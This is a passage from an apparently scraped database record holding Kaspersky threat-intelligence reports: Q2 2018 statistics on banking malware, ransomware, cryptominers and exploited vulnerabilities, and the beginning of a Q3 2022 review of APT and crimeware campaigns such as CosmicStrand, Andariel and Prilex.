as a result of a joint operation between Spain's national police, Europol and FBI, as well as Romanian, Moldovan, Belorussian and Taiwanese authorities and private infosecurity companies. It was expected that the leader's arrest would reduce the group's activity, however recent data show that no appreciable decline has taken place. In May and June, we detected several waves of targeted phishing against banks and processing companies in Eastern Europe. The email writers from Carbanak masquerades as support lines of reputable anti-malware vendors, European Central Bank and other organizations. Such emails contained attached weaponized documents exploiting vulnerabilities CVE-2017-11882 and CVE-2017-8570.\n\n#### **Ransomware Trojan uses Doppelg\u00e4nging technique**\n\nKaspersky Lab experts [detected](<https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/>) a case of the ransomware Trojan SynAck using the Process Doppelg\u00e4nging technique. Malware writers use this complex technique to make it stealthier and complicate its detection by security solutions. This was the first case when it was used in a ransomware Trojan.\n\nAnother remarkable event was the Purga (aka Globe) cryptoware propagation [campaign](<https://securelist.ru/trojan-dimnie-and-ransomware-purga/90272/>), during which this cryptoware, alongside with other malware including a banking Trojan, was loaded to computers infected with the Trojan Dimnie.\n\n### General statistics on financial threats\n\n_These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data. _\n\nIn Q2 2018, Kaspersky Lab solutions blocked attempts to launch one or more malicious programs designed to steal money from bank accounts on the computers of 215,762 users.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175934/180803-it-threat-evolution-q2-2018-statistics-11.png>)\n\n \n_Number of unique users attacked by financial malware, Q2 2018_\n\n#### **Geography of attacks**\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175850/180803-it-threat-evolution-q2-2018-statistics-12.png>)\n\n_Geography of banking malware attacks, Q2 2018_\n\n#### **TOP 10 countries by percentage of attacked users**\n\n| **Country*** | **% ****of users attacked**** \n---|---|--- \n1 | Germany | 2.7% \n2 | Cameroon | 1.8% \n3 | Bulgaria | 1.7% \n4 | Greece | 1.6% \n5 | United Arab Emirates | 1.4% \n6 | China | 1.3% \n7 | Indonesia | 1.3% \n8 | Libya | 1.3% \n9 | Togo | 1.3% \n10 | Lebanon | 1.2% \n \n_These statistics are based on Anti-Virus detection verdicts received from users of Kaspersky Lab products who consented to provide statistical data.\n\n*Excluded are countries with relatively few Kaspersky Lab' product users (under 10,000). \n** Unique Kaspersky Lab users whose computers were targeted by banking Trojans or ATM/PoS malware as a percentage of all unique users of Kaspersky Lab products in the country._\n\n#### **TOP 10 banking malware families**\n\n| Name | Verdicts* | % of attacked users** \n---|---|---|--- \n1 | Nymaim | Trojan.Win32. Nymaim | 27.0% | \n2 | Zbot | Trojan.Win32. Zbot | 26.1% | \n3 | SpyEye | Backdoor.Win32. SpyEye | 15.5% | \n4 | Emotet | Backdoor.Win32. Emotet | 5.3% | \n5 | Caphaw | Backdoor.Win32. Caphaw | 4.7% | \n6 | Neurevt | Trojan.Win32. Neurevt | 4.7% | \n7 | NeutrinoPOS | Trojan-Banker.Win32.NeutrinoPOS | 3.3% | \n8 | Gozi | Trojan.Win32. Gozi | 2.0% | \n9 | Shiz | Backdoor.Win32. Shiz | 1.5% | \n10 | ZAccess | Backdoor.Win32. ZAccess | 1.3% | \n \n_* Detection verdicts of Kaspersky Lab products. The information was provided by Kaspersky Lab product users who consented to provide statistical data. \n** Unique users attacked by this malware as a percentage of all users attacked by financial malware._\n\nIn Q2 2018, the general makeup of TOP 10 stayed the same, however there were some changes in the ranking. Trojan.Win32.Zbot (26.1%) and Trojan.Win32.Nymaim (27%) remain in the lead after swapping positions. The banking Trojan Emotet ramped up its activity and, accordingly, its share of attacked users from 2.4% to 5.3%. Conversely, Caphaw dramatically downsized its activity to only 4.7% from 15.2% in Q1, taking fifth position in the rating.\n\n### Cryptoware programs\n\n#### **Number of new modifications**\n\nIn Q2, we detected 7,620 new cryptoware modifications. This is higher than in Q1, but still well below last year's numbers.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175849/180803-it-threat-evolution-q2-2018-statistics-13.png>)\n\n_Number of new cryptoware modifications, Q2 2017 \u2013 Q2 2018_\n\n#### **Number of users attacked by Trojan cryptors**\n\nIn Q2 2018, Kaspersky Lab products blocked cryptoware attacks on the computers of 158,921 unique users. Our statistics show that cybercriminals' activity declined both against Q1 and on a month-on-month basis during Q2.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175940/180803-it-threat-evolution-q2-2018-statistics-14.png>)\n\n_Number of unique users attacked by cryptors, Q2 2018_\n\n#### **Geography of attacks**\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175856/180803-it-threat-evolution-q2-2018-statistics-15.png>)\n\n#### **TOP 10 countries attacked by Trojan cryptors**\n\n| **Country*** | **% of users attacked by cryptors**** \n---|---|--- \n1 | Ethiopia | 2.49 \n2 | Uzbekistan | 1.24 \n3 | Vietnam | 1.21 \n4 | Pakistan | 1.14 \n5 | Indonesia | 1.09 \n6 | China | 1.04 \n7 | Venezuela | 0.72 \n8 | Azerbaijan | 0.71 \n9 | Bangladesh | 0.70 \n10 | Mongolia | 0.64 \n \n_* Excluded are countries with relatively few Kaspersky Lab users (under 50,000). \n** Unique users whose computers were attacked by Trojan cryptors as a percentage of all unique users of Kaspersky Lab products in the country._\n\nThe list of TOP 10 countries in Q2 is practically identical to that in Q1. However, some place trading occurred in TOP 10: Ethiopia (2.49%) pushed Uzbekistan (1.24%) down from first to second place, while Pakistan (1.14%) rose to fourth place. Vietnam (1.21%) remained in third position, and Indonesia (1.09%) remained fifth.\n\n#### **TOP 10 most widespread cryptor families**\n\n| **Name** | **Verdicts*** | **% ****of attacked users**** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 53.92 | \n2 | GandCrab | Trojan-Ransom.Win32.GandCrypt | 4.92 | \n3 | PolyRansom/VirLock | Virus.Win32.PolyRansom | 3.81 | \n4 | Shade | Trojan-Ransom.Win32.Shade | 2.40 | \n5 | Crysis | Trojan-Ransom.Win32.Crusis | 2.13 | \n6 | Cerber | Trojan-Ransom.Win32.Zerber | 2.09 | \n7 | (generic verdict) | Trojan-Ransom.Win32.Gen | 2.02 | \n8 | Locky | Trojan-Ransom.Win32.Locky | 1.49 | \n9 | Purgen/GlobeImposter | Trojan-Ransom.Win32.Purgen | 1.36 | \n10 | Cryakl | Trojan-Ransom.Win32.Cryakl | 1.04 | \n| | | | | \n \n_* Statistics are based on detection verdicts of Kaspersky Lab products. The information was provided by Kaspersky Lab product users who consented to provide statistical data. \n** Unique Kaspersky Lab users attacked by a particular family of Trojan cryptors as a percentage of all users attacked by Trojan cryptors._\n\nWannaCry further extends lead over other cryptor families, its share rising to 53.92% from 38.33% in Q1. Meanwhile, the cybercriminals behind GandCrab (4.92%, emerged only in Q1 2018) put so much effort into its distribution that it rose all the way up to second place in this TOP 10, displacing the polymorphic worm PolyRansom (3.81%). The remaining positions, just like in Q1, are occupied by the long-familiar cryptors Shade, Crysis, Purgen, Cryakl etc.\n\n### Cryptominers\n\nAs we already reported in [Ransomware and malicious cryptominers in 2016-2018](<https://securelist.com/ransomware-and-malicious-crypto-miners-in-2016-2018/86238/>), ransomware is shrinking progressively, and cryptocurrency miners is starting to take its place. Therefore, this year we decided to begin to publish quarterly reports on the situation around type of threats. Simultaneously, we began to use a broader range of verdicts as a basis for collecting statistics on miners, so the Q2 statistics may not be consistent with the data from our earlier publications. It includes both stealth miners which we detect as Trojans, and those which are issued the verdict 'Riskware not-a-virus'_._\n\n#### **Number of new modifications**\n\nIn Q2 2018, Kaspersky Lab solutions detected 13,948 new modifications of miners.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175945/180803-it-threat-evolution-q2-2018-statistics-16.png>)\n\n_Number of new miner modifications, Q2 2018_\n\n#### **Number of users attacked by cryptominers **\n\nIn Q2, we detected attacks involving mining programs on the computers of 2,243,581 Kaspersky Lab users around the world.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175951/180803-it-threat-evolution-q2-2018-statistics-17.png>)\n\n_Number of unique users attacked by cryptominers, Q2 2018_\n\nIn April and May, the number of attacked users stayed roughly equal, and in June there was a modest decrease in cryptominers' activity.\n\n#### **Geography of attacks**\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175856/180803-it-threat-evolution-q2-2018-statistics-18.png>)\n\n_Geography of cryptominer attacks, Q2 2018_\n\n#### **TOP 10 countries by percentage of attacked users**\n\n| **Country*** | **% of attacked users**** \n---|---|--- \n1 | Ethiopia | 17.84 \n2 | Afghanistan | 16.21 \n3 | Uzbekistan | 14.18 \n4 | Kazakhstan | 11.40 \n5 | Belarus | 10.47 \n6 | Indonesia | 10.33 \n7 | Mozambique | 9.92 \n8 | Vietnam | 9.13 \n9 | Mongolia | 9.01 \n10 | Ukraine | 8.58 \n \n_*Excluded are countries with relatively few Kaspersky Lab' product users (under 50,000). \n** Unique Kaspersky Lab users whose computers were targeted by miners as a percentage of all unique users of Kaspersky Lab products in the country._\n\n## Vulnerable apps used by cybercriminals\n\nIn Q2 2018, we again observed some major changes in the distribution of platforms most often targeted by exploits. The share of Microsoft Office exploits (67%) doubled compared to Q1 (and quadrupled compared with the average for 2017). Such a sharp growth was driven primarily by massive spam messages distributing documents containing an exploit to the vulnerability [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>). This stack overflow-type vulnerability in the old, deprecated Equation Editor component existed in all versions of Microsoft Office released over the last 18 years. The exploit still works stably in all possible combinations of the Microsoft Office package and Microsoft Windows. On the other hand, it allows the use of various obfuscations for bypassing the protection. These two factors made this vulnerability the most popular tool in cybercriminals' hands in Q2. The shares of other Microsoft Office vulnerabilities did no undergo much change since Q1.\n\nQ2 KSN statistics also showed a growing number of Adobe Flash exploits exploited via Microsoft Office. Despite Adobe and Microsoft's efforts to obstruct exploitation of Flash Player, a new 0-day exploit [CVE-2018-5002](<http://blogs.360.cn/blog/cve-2018-5002-en/>) was discovered in Q2. It propagated in an XLSX file and used a little-known technique allowing the exploit to be downloaded from a remote source rather than carried in the document body. Shockwave Flash (SWF) files, like many other file formats, are rendered in Microsoft Office documents in the OLE (Object Linking and Embedding) format. In the case of a SWF file, the OLE object contains the actual file and a list of various properties, one of which points to the path to the SWF file. The OLE object in the discovered exploit did not contain an SWF file in it, but only carried a list of properties including a web link to the SWF file, which forced Microsoft Office to download the missing file from the provided link.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175902/180803-it-threat-evolution-q2-2018-statistics-19.png>)\n\n_Distribution of exploits used in cybercriminals' attacks by types of attacked applications, Q2 2018_\n\nIn late March 2018, a PDF document was detected at VirusTotal that contained two 0-day vulnerabilities: [CVE-2018-4990](<https://helpx.adobe.com/security/products/acrobat/apsb18-09.html>) and [CVE-2018-8120](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-8120>). The former allowed for execution of shellcode from JavaScript via exploitation of a software error in JPEG2000 format image processor in Acrobat Reader. The latter existed in the win32k function [SetImeInfoEx](<https://cloudblogs.microsoft.com/microsoftsecure/2018/07/02/taking-apart-a-double-zero-day-sample-discovered-in-joint-hunt-with-eset/>) and was used for further privilege escalation up to SYSTEM level and enabled the PDF viewer to escape the sandbox. Ana analysis of the document and our statistics show that at the moment of uploading to VirusTotal, this exploit was at the development stage and was not used for in-the-wild attacks.\n\nIn late April, Kaspersky Lab experts using an in-house sandbox have found the 0-day vulnerability [CVE-2018-8174](<https://securelist.com/root-cause-analysis-of-cve-2018-8174/85486/>) in Internet Explorer and reported it to Microsoft. An exploit to this vulnerability used a technique associated with [CVE-2017-0199](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199>) (launching an HTA script from a remote source via a specially crafted OLE object) to exploit a vulnerable Internet Explorer component with the help of Microsoft Office. We are observing that exploit pack creators have already taken this vulnerability on board and actively distribute exploits to it both via web sites and emails containing malicious documents.\n\nAlso in Q2, we observed a growing number of network attacks. There is a growing share of attempts to exploit the vulnerabilities patched with the security update MS17-010; these make up a majority a of the detected network attacks.\n\n## Attacks via web resources\n\n_The statistics in this chapter are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Top 10 countries where online resources are seeded with malware\n\n_The following statistics are based on the physical location of the online resources used in attacks and blocked by our antivirus components (web pages containing redirects to exploits, sites containing exploits and other malware, botnet command centers, etc.). Any unique host could be the source of one or more web attacks. In order to determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn the second quarter of 2018, Kaspersky Lab solutions blocked 962,947,023 attacks launched from web resources located in 187 countries around the world. 351,913,075 unique URLs were recognized as malicious by web antivirus components.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175958/180803-it-threat-evolution-q2-2018-statistics-20.png>)\n\n_Distribution of web attack sources by country, Q2 2018_\n\nIn Q2, the TOP 4 of web attack source countries remain unchanged. The US (45.87%) was home to most sources of web attacks. The Netherlands (25.74%) came second by a large margin, Germany (5.33%) was third. There was a change in the fifth position: Russia (1.98%) has displaced the UK, although its share has decreased by 0.55 p.p.\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky Lab users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious programs that fall under the _Malware class_; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Belarus | 33.49 \n2 | Albania | 30.27 \n3 | Algeria | 30.08 \n4 | Armenia | 29.98 \n5 | Ukraine | 29.68 \n6 | Moldova | 29.49 \n7 | Venezuela | 29.12 \n8 | Greece | 29.11 \n9 | Kyrgyzstan | 27.25 \n10 | Kazakhstan | 26.97 \n11 | Russia | 26.93 \n12 | Uzbekistan | 26.30 \n13 | Azerbaijan | 26.12 \n14 | Serbia | 25.23 \n15 | Qatar | 24.51 \n16 | Latvia | 24.40 \n17 | Vietnam | 24.03 \n18 | Georgia | 23.87 \n19 | Philippines | 23.85 \n20 | Romania | 23.55 \n \n_These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky Lab products who consented to provide statistical data. \nExcluded are countries with relatively few Kaspersky Lab users (under 10,000). \n** Unique users targeted by Malware-class attacks as a percentage of all unique users of Kaspersky Lab products in the country._\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175858/180803-it-threat-evolution-q2-2018-statistics-21.png>)\n\n_Geography of malicious web attacks in Q2 2018 (percentage of attacked users)_\n\nOn average, 19.59% of Internet user computers worldwide experienced at least one Malware-class web attack.\n\n## Local threats\n\n_Local infection statistics for user computers are an important indicator: they reflect threats that have penetrated computer systems by infecting files or removable media, or initially got on the computer in an encrypted format (for example, programs integrated in complex installers, encrypted files, etc.)._\n\n_Data in this section is based on analyzing statistics produced by Anti-Virus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media._\n\nIn Q2 2018, our File Anti-Virus detected 192,053,604 malicious and potentially unwanted objects.\n\n### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky Lab product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nThe rating includes only _Malware-class_ attacks. It does not include File Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Uzbekistan | 51.01 \n2 | Afghanistan | 49.57 \n3 | Tajikistan | 46.21 \n4 | Yemen | 45.52 \n5 | Ethiopia | 43.64 \n6 | Turkmenistan | 43.52 \n7 | Vietnam | 42.56 \n8 | Kyrgyzstan | 41.34 \n9 | Rwanda | 40.88 \n10 | Mongolia | 40.71 \n11 | Algeria | 40.25 \n12 | Laos | 40.18 \n13 | Syria | 39.82 \n14 | Cameroon | 38.83 \n15 | Mozambique | 38.24 \n16 | Bangladesh | 37.57 \n17 | Sudan | 37.31 \n18 | Nepal | 37.02 \n19 | Zambia | 36.60 \n20 | Djibouti | 36.35 \n \n_These statistics are based on detection verdicts returned by OAS and ODS Anti-Virus modules received from users of Kaspersky Lab products who consented to provide statistical data. The data include detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera and phone memory cards, or external hard drives. \nExcluded are countries with relatively few Kaspersky Lab users (under 10,000). \n** Unique users on whose computers Malware-class local threats were blocked, as a percentage of all unique users of Kaspersky Lab products in the country._\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175902/180803-it-threat-evolution-q2-2018-statistics-22.png>)\n\n_Geography of malicious web attacks in Q2 2018 (ranked by percentage of users attacked)_\n\nOn average, 19.58% of computers globally faced at least one Malware-class local threat in Q2.", "cvss3": {}, "published": "2018-08-06T10:00:04", "type": "securelist", "title": "IT threat evolution Q2 2018. Statistics", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8570", "CVE-2018-4990", "CVE-2018-5002", "CVE-2018-8120", "CVE-2018-8174"], "modified": "2018-08-06T10:00:04", "id": "SECURELIST:A2A995C1C898D3DA4DB008FBA6AA149E", "href": "https://securelist.com/it-threat-evolution-q2-2018-statistics/87170/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2022-11-18T08:07:16", "description": "\n\n * **IT threat evolution in Q3 2022**\n * [IT threat evolution in Q3 2022. Non-mobile statistics](<https://securelist.com/it-threat-evolution-in-q3-2022-non-mobile-statistics/107963/>)\n * [IT threat evolution in Q3 2022. Mobile statistics](<https://securelist.com/it-threat-evolution-in-q3-2022-mobile-statistics/107978/>)\n\n## Targeted attacks\n\n### CosmicStrand: discovery of a sophisticated UEFI rootkit\n\nIn July, we [reported a rootkit](<https://securelist.com/cosmicstrand-uefi-firmware-rootkit/106973/>) that we found in modified [Unified Extensible Firmware Interface](<https://encyclopedia.kaspersky.com/glossary/uefi/?utm_source=SL&utm_medium=SL&utm_campaign=SL>) (UEFI) firmware, the code that loads and initiates the boot process when the computer is turned on. Rootkits are malware implants that are installed deep in the operating system. Difficult to detect, they ensure that a computer remains infected even if someone reinstalls the operating system or replaces the hard drive. However, they aren't easy to create: the slightest programming error could crash the machine. Nevertheless, in our [APT predictions for 2022](<https://securelist.com/advanced-threat-predictions-for-2022/104870/>), we noted that more attackers would reach the sophistication level required to develop such tools.\n\nThe main purpose of CosmicStrand is to download a malicious program at startup, which then performs the tasks set by the attackers. Having successfully passed through all stages of the boot process, the rootkit eventually runs a shell code and contacts the attackers' C2 (Command-and-Control) server, from which it receives a malicious payload.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/07/20124904/CosmicStrand_UEFI_malware_01.png>)\n\nWe were unable to intercept the file received by the rootkit from the C2 server. However, on one of the infected machines, we found malware that we think is probably related to CosmicStrand. This malware creates a user named "aaaabbbb" in the operating system with local administrator rights.\n\nWe identified targets of CosmicStrand, which we attribute to an unknown Chinese-speaking threat actor, in China, Vietnam, Iran and Russia. All of them were ordinary people using our free antivirus solution, seemingly unconnected with any organization of interest to a sophisticated attacker of this kind. It also turned out that the motherboards infected in all known cases came from just two manufacturers. Therefore, it's likely that the attackers found some common vulnerability in these motherboards that made UEFI infection possible.\n\nIt's also unclear how the attackers managed to deliver the malware. It's possible that the attackers are able to infect UEFI remotely. Or that those infected had purchased a modified motherboard from a reseller.\n\n### Andariel deploys DTrack and Maui ransomware\n\nOn 6 July, the US CISA (Cybersecurity and Infrastructure Security Agency) published an [alert](<https://www.cisa.gov/uscert/ncas/alerts/aa22-187a>) in which they accused North Korean state-sponsored threat actors of using the Maui ransomware to target the US healthcare sector. While CISA offered nothing to substantiate its attribution, [we determined](<https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/>) that approximately 10 hours prior to deploying Maui to the initial target system, the group deployed a variant of the well-known DTrack malware to the same target, preceded by deployment of the 3proxy tool months earlier. We believe that this helps to solidify the attribution to the Korean-speaking APT Andariel (aka Silent Chollima and Stonefly), with low-to-medium confidence.\n\nAndariel's primary tool is DTrack, used to collect information about the target, send it to a remote host and, in the case of the variant used in these attacks, store it on a remote host in the target network. When the attackers find noteworthy data, the Maui ransomware is deployed \u2013 it is typically detected on targeted hosts 10 hours after the activation of DTrack.\n\nThe attackers also use another tool, called 3Proxy, to maintain remote access to the compromised computer.\n\nTo infect target systems, the attackers exploit unpatched versions of public online services. In one such case, the malware was downloaded from an HFS (HTTP file server): the attackers used an unknown exploit that enabled them to run a PowerShell script from a remote server. In another, they were able to compromise a WebLogic server through an exploit for the CVE-2017-10271 vulnerability, which ultimately allowed them to run a script.\n\nOur research revealed that, rather than just focusing on a particular industry, Andariel is ready to attack any company. We detected at least one attack on a housing company in Japan, as well as several targets in India, Vietnam and Russia.\n\n### VileRAT: DeathStalker's continuous strike at foreign and crypto-currency exchanges\n\nIn late August 2020, we published an [overview of DeathStalker](<https://securelist.com/deathstalker-mercenary-triumvirate/98177/>) and its activities, including the Janicab, Evilnum and PowerSing campaigns. Later that year, we documented the [PowerPepper](<https://securelist.com/what-did-deathstalker-hide-between-two-ferns/99616/>) campaign. We believe DeathStalker to be a group of mercenaries, offering hack-for-hire services, or acting as an information broker to support competitive and financial intelligence efforts. Meanwhile, in August 2020, we also released a private report on VileRAT for our threat intelligence customers. VileRAT is a Python implant, part of [an evasive and highly intricate attack campaign](<https://securelist.com/vilerat-deathstalkers-continuous-strike/107075/>) against foreign exchange and cryptocurrency trading companies. We discovered it in Q2 2020 as part of an update of Evilnum, and attributed it to DeathStalker.\n\nSince we first identified it, DeathStalker has continuously updated and used its VileRAT tool-chain against the same type of targets.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/05135347/VileRAT_DeathStalkers_continuous_strike_02.png>)\n\nThe threat actor has also sought to escape detection. However, the VileRAT campaign took this to another level: it is undoubtedly the most intricate, obfuscated and tentatively evasive campaign we have ever identified from DeathStalker. From state-of-the-art obfuscation with VBA and JavaScript, to multi-layered and low-level packing with Python, a robust multi-stage in-memory PE loader and security vendor-specific heuristic bypasses \u2013 the threat actor has left nothing to chance. On top of this, DeathStalker has developed a vast and quickly changing infrastructure as well.\n\nOn the other side, there are some glitches and inconsistencies. VileRAT, the final payload in the tool-chain is more than 10MB in size. The group uses simple infection vectors, many suspicious communication patterns, noisy and easy-to-identify process executions or file deployments, as well as sketchy development practices leaving bugs that require frequent implant updates. For these reasons, an effective endpoint solution will still be able to detect and block most VileRAT-related malicious activities.\n\nUsing only data that we could verify with our own telemetry, we identified 10 organizations compromised or targeted by DeathStalker since 2020 \u2013 in Bulgaria, Cyprus, Germany, the Grenadines, Kuwait, Malta, the UAE and the Russian Federation.\n\nWe do not know what DeathStalker's principal intention is in targeting these organizations: this could range from due diligence, asset recovery, information gathering in the context of litigation or arbitration cases, aiding customers to bypass sanctions and/or spying on targets' customers. However, it does not appear to be direct financial gain.\n\n### Kimsuky's GoldDragon cluster and C2 operations\n\nKimsuky is a prolific and active threat actor primarily targeting North Korea-related entities. Like other sophisticated adversaries, this group updates its tools frequently. We recently had the chance to investigate how the threat actor configures its GoldDragon cluster and what kind of tricks it uses to confirm and further validate its victims. The Kimsuky group has configured multi-stage C2 servers with various commercial hosting services located around the world.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/22113157/Kimsukys_GoldDragon_03.png>)\n\nThe attacks occur in several stages. First, the threat actor sends a spear-phishing email to the potential victim with a lure to download additional documents. If the victim clicks the link, it results in a connection to the first-stage C2 server, with an email address as a parameter. The first-stage C2 server verifies that the incoming email address parameter is expected and delivers the malicious document if it's in the target list. The first-stage script also forwards the victim's IP address to the next-stage server. When the fetched document is opened, it connects to the second C2 server. The corresponding script on the second C2 server checks the IP address forwarded from the first-stage server to verify that it's an expected request from the same victim. Using this IP validation scheme, the actor verifies whether the incoming request is from the victim or not. On top of that, the operator relies on several other processes to carefully deliver the next payload. Another C2 script on the second C2 server checks the operating system type and predefined user-agent strings to filter out requests from security researchers or auto-analysis systems.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/22112947/Kimsukys_GoldDragon_01.png>)\n\nBased on the contents of the decoy document, we hypothesize that the targets of this operation are people or entities related to political or diplomatic activities. We know that historically politicians, diplomats, journalists, professors and North Korean defectors have been prime targets of the Kimsuky group. The email address names from the C2 scripts help to confirm this hypothesis.\n\nOur [research](<https://securelist.com/kimsukys-golddragon-cluster-and-its-c2-operations/107258/>) underlines how Kimsuky pays close attention to validating its victims and delivering the next-stage payloads to them, while taking steps to make analysis difficult.\n\n### Targeted attacks on industrial enterprises\n\nIn August, Kaspersky ICS CERT experts reported [a wave of targeted attacks on military industrial complex enterprises and public institutions](<https://ics-cert.kaspersky.com/publications/reports/2022/08/08/targeted-attack-on-industrial-enterprises-and-public-institutions/?utm_source=securelist&utm_medium=link&utm_campaign=targeted-attack-on-industrial-enterprises-and-public-institutions>) in Belarus, Russia, Ukraine and Afghanistan. The attacks, which took place earlier this year, affected industrial plants, design bureaus and research institutes, government agencies, ministries and departments. We identified more than a dozen targets, and observed significant overlaps in TTPs (Tactics, Techniques and Procedures) with the threat actor TA428.\n\nThe attackers gained access to the enterprise network using carefully crafted phishing emails. Some of the information they contained is not publicly available, indicating that the attackers conducted reconnaissance ahead of the attack, possibly using information obtained in earlier attacks on the target organization or others associated with the target. Microsoft Word documents attached to the phishing emails contained malicious code that exploits the [CVE-2017-11882](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882>) vulnerability, which enables an attacker to execute arbitrary code \u2013 in this case, the main module of the PortDoor backdoor \u2013 without any additional user action.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/03155648/APT_TA428_targeted_attack_01.png>)\n\nThe attackers used five different backdoors at the same time \u2013 probably for redundancy. They provide extensive functionality for controlling infected systems and collecting confidential data. Once they have gained initial access, the attackers attempt to spread to other computers on the network. Once they have obtained domain administrator privileges, they search for, and exfiltrate, sensitive data to their servers hosted in different countries \u2013 these servers are also used as first-stage C2 servers. The attackers compress stolen files into encrypted and password-protected ZIP archives. After receiving the data, the first-stage C2 servers forward the archives to a second-stage server located in China.\n\n## Other malware\n\n### Prilex: the pricey prickle credit card complex\n\nPrilex, active since 2014, is a well-known threat actor targeting ATMs and Point of Sale (PoS) terminals. In 2016, the group began to focus all its activities on PoS systems. Since then the group has greatly improved its malware: it develops complex threats and poses a major threat to the payment chain. Prilex is now conducting so-called "GHOST" attacks \u2013 fraudulent transactions using cryptograms, which are pre-generated by the victim's card during the store payment process.\n\nThe group delivers its malware using social engineering. The cybercriminals call their chosen target and tell them their PoS software needs to be updated by a technician. Later, the fake technician goes to the targeted company in person and infects the machines. Alternatively, they persuade the target to install AnyDesk and use this to install the malware remotely.\n\nPrior to striking victims, the cybercriminals perform an initial screening of the machine, in order to check the number of transactions that have already taken place and whether this target is worth attacking. If so, the malware captures any running transaction and modifies its content in order to be able to capture the card information. All the captured card details are then saved to an encrypted file, which is later sent to the attackers' server, allowing them to make transactions through a fraudulent PoS device registered in the name of a fake company.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/09/28092316/Prilex_ATM_and_PoS_report_10_1.png>)\n\nHaving attacked one PoS system, the cybercriminals obtain data from dozens, or even hundreds, of cards daily. It is especially dangerous if the infected machines are located in popular shopping malls in densely populated cities, where the daily flow of customers can reach thousands of people.\n\nIn [our recent investigation](<https://securelist.com/prilex-atm-pos-malware-evolution/107551/>), we discovered that the Prilex group is controlling the development lifecycle of its malware using Subversion \u2013 used by professional development teams. Moreover, there is also a supposed official Prilex website selling its malware kits to other cybercriminals as Malware-as-a-Service (MaaS). Prilex has previously sold various versions of its malware on the [dark web](<https://encyclopedia.kaspersky.com/glossary/dark-web/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), for example, in 2019 a German bank [lost more than \u20ac1.5 million](<https://www.zdnet.com/article/german-bank-loses-eur1-5-million-in-mysterious-cashout-of-emv-cards/>) in a similar attack by the Prilex malware. The development of its MasS operation means that highly sophisticated and dangerous PoS malware could spread to many countries, increasing the risk of multimillion-dollar losses for businesses all around the world.\n\nWe also discovered web sites and Telegram chats where cybercriminals sell Prilex malware. Posing as the Prilex group itself, they offer the latest versions of PoS malware, costing from $3,500 to $13,000. We are not sure about the real ownership of these web sites, as they could be copycats.\n\n### Luna and Black Basta: new ransomware for Windows, Linux and ESXi\n\nRansomware groups have increasingly targeted not only Windows computers, but also Linux devices and ESXi virtual machines. We highlighted one example earlier this year \u2013 the [BlackCat](<https://www.kaspersky.com/blog/black-cat-ransomware/44120/>) gang, which distributes malware written in the cross-platform language Rust. We recently analyzed two other malware families that provide similar functionality: [Black Basta and Luna](<https://securelist.com/luna-black-basta-ransomware/106950/>).\n\nBlack Basta, first discovered in February, exists in versions for Windows and for Linux \u2013 the latter primarily targeting ESXi virtual machine images. One of the key features of the Windows version is that it boots the system in Safe Mode before encrypting data: this allows the malware to evade detection by security solutions, many of which don't work in Safe Mode.\n\nAt the time we published our report, Black Basta operators had released information on 40 victims, among them manufacturing and electronics firms, contractors, and others, located in the US, Australia, Europe, Asia and Latin America.\n\nLuna, discovered in June and also written in Rust, is 